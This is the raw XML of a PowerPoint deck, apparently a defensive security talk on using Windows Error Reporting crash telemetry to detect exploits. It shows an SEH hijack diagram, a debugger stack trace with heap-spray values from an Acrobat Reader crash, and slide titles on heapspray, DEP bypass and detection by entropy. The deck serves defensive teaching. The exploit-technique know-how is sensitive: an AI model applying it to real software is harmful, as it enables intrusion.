              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;shellcode&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Explosion 1 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="1295400"/>
            <a:ext cx="152400" cy="152400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1.21387E-6 L 3.46945E-18 0.64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SEH Hijack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295401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</a:rPr>
              <a:t>0494913805.cab E:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0:000&gt; kb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ChildEBP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RetAddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to Child</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b3c0 77c69244 77a2c3e4 00000002 0012b414 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ntdll!KiFastSystemCallRet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b3c4 77a2c3e4 00000002 0012b414 00000001 ntdll!ZwWaitForMultipleObjects+0xc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b460 77a2c64e 0012b414 0012b4b0 00000000 kernel32!WaitForMultipleObjectsEx+0x11d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b47c 77a9db5d 00000002 0012b4b0 00000000 kernel32!WaitForMultipleObjects+0x18</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b4e8 77a9dd89 0219bf90 00000001 00000001 kernel32!WerpReportFaultInternal+0x16d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b4fc 77a7f54d 0219bf90 00000001 fffecf74 kernel32!WerpReportFault+0x70</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b588 01fa6a4d 00000000 f03da35c 0fc25ca3 kernel32!UnhandledExceptionFilter+0x1b5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WARNING: Stack unwind information not available. Following frames may be wrong.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b8bc 01d52c7d 04912970 00000000 049321a0 AcroRd32_1ac0000+0x4e6a4d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b944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AcroRd32_1ac0000+0x292c7d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b948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0012b94c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0012b950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0012b954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0012b958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0012b95c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0012b960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0012b964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0012b968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0012b96c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  <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b970 0c0c0c0c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</a:rPr>
              <a:t>0c0c0c0c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0xc0c0c0c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6400" y="3810000"/>
            <a:ext cx="5791200" cy="2895600"/>
          </a:xfrm>
          <a:prstGeom prst="round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1" y="4724400"/>
            <a:ext cx="4239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Stack Overrun</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8527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057400" y="1295400"/>
            <a:ext cx="23622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66800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SEH Hijack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23393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400" y="25908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38400" y="34061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36576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38400" y="4549140"/>
            <a:ext cx="1600200" cy="255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0xfffffff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38400" y="4800600"/>
            <a:ext cx="1600200" cy="2559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8" name="Arc 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2209800" y="2438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H="1">
            <a:off x="2209800" y="3581400"/>
            <a:ext cx="381000" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 533325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400" y="2971800"/>
            <a:ext cx="1600200" cy="25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pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 6" descr="C:\Users\mattt\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DA1L80Y3\MPj04000160000[1]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150C17"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="150C1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162628"/>
            <a:ext cx="1600200" cy="10668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248400" y="4648200"/>
            <a:ext cx="26670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_except_handler3()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kernel32.dll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14800" y="49530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114800" y="3810000"/>
            <a:ext cx="2057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114800" y="2743200"/>
            <a:ext cx="205740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57400" y="762000"/>
            <a:ext cx="23622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TEB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       FS:0                          </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Arc 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2057399" y="1219201"/>
            <a:ext cx="685800" cy="1195137"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 55723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5687</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1313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Segoe UI</vt:lpstr>
      <vt:lpstr>Segoe UI Light</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>1_Office Theme</vt:lpstr>
      <vt:lpstr>Using Error Reporting to  Detect Network Attacks</vt:lpstr>
      <vt:lpstr>Crashes feed Telemetry</vt:lpstr>
      <vt:lpstr>Crashes feed Telemetry</vt:lpstr>
      <vt:lpstr>MS07-029 DNS  0-day</vt:lpstr>
      <vt:lpstr>HOW do exploits WORK?</vt:lpstr>
      <vt:lpstr>Exploit Engineering 101</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SEH Hijack</vt:lpstr>
      <vt:lpstr>SEH Hijack</vt:lpstr>
      <vt:lpstr>SEH Hijack</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Locate and Call APIs</vt:lpstr>
      <vt:lpstr>Exploit without Heapspray</vt:lpstr>
      <vt:lpstr>Exploit with Heapspray</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Return to libc to turn off DEP</vt:lpstr>
      <vt:lpstr>Return to libc to turn off DEP</vt:lpstr>
      <vt:lpstr>Return to libc to turn off DEP</vt:lpstr>
      <vt:lpstr>Why do exploits fail?</vt:lpstr>
      <vt:lpstr>Why might it fail?</vt:lpstr>
      <vt:lpstr>75% of IE exploits use heapspray</vt:lpstr>
      <vt:lpstr>Data Execute Protection</vt:lpstr>
      <vt:lpstr>Poor Spray Timing</vt:lpstr>
      <vt:lpstr>Spray Memory Already Occupied</vt:lpstr>
      <vt:lpstr>!analyze</vt:lpstr>
      <vt:lpstr>New Problem Class IDs, cont.</vt:lpstr>
      <vt:lpstr>Exception Chain Validation</vt:lpstr>
      <vt:lpstr>Detecting HEAPSPRAY by measuring entropy</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Sometimes they ain't too smart</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>OOPS 1</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Why did it crash?</vt:lpstr>
      <vt:lpstr>OOPS 2</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>From Virus Bulletin 2018 Keynote</vt:lpstr>
      <vt:lpstr>Windows Error Reporting: Bucketing Level One</vt:lpstr>
      <vt:lpstr>Windows Error Reporting: Labels</vt:lpstr>
      <vt:lpstr>Windows Error Reporting: Bucketing Level 2</vt:lpstr>
      <vt:lpstr>Windows Error Reporting: Labeling Level 2</vt:lpstr>
      <vt:lpstr>Data Execute Protection</vt:lpstr>
      <vt:lpstr>Detecting Heapspray through Entropy</vt:lpstr>
      <vt:lpstr>Windows Error Reporting: Bucketing Level One</vt:lpstr>
      <vt:lpstr>CVE-2012-0158 (MS12-027)</vt:lpstr>
      <vt:lpstr>Malicious files</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Attack Sequence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Error Reporting to  Detect Network Attacks</dc:title>
  <dc:creator>John Lambert (MSTIC)</dc:creator>
  <cp:lastModifiedBy>John Lambert (MSTIC)</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-19T15:10:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-19T15:34:37Z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2019-10-19T15:10:27Z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98be5f4e-3ce0-452f-962c-00003736c6d6</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_f42aa342-8706-4288-bd11-ebb85995028c_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>